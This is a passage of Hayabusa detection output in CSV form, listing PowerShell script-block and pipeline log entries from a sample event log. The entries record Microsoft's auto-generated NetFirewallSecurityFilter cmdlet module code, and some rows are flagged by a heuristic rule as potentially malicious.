$__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSecurityFilter' -Alias '*' function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] 
[string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if 
($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.401 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) $__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) 
$__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) $__cmdletization_queryBuilder.FilterByProperty('RemoteMachines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterBySecurity', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { 
try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallSecurityFilter' -Alias '*' function Set-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication] ${Authentication}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption] ${Encryption}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${OverrideBlockRules}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${LocalUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteUser}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${RemoteMachine}, [Parameter(ParameterSetName='Query (cdxml)')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:38.401 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; 
ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { 
[object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:38.401 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteUsers'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteMachines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallSecurityFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallSecurityFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:38.401 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" 
ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
2021-04-22 19:19:38.403 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
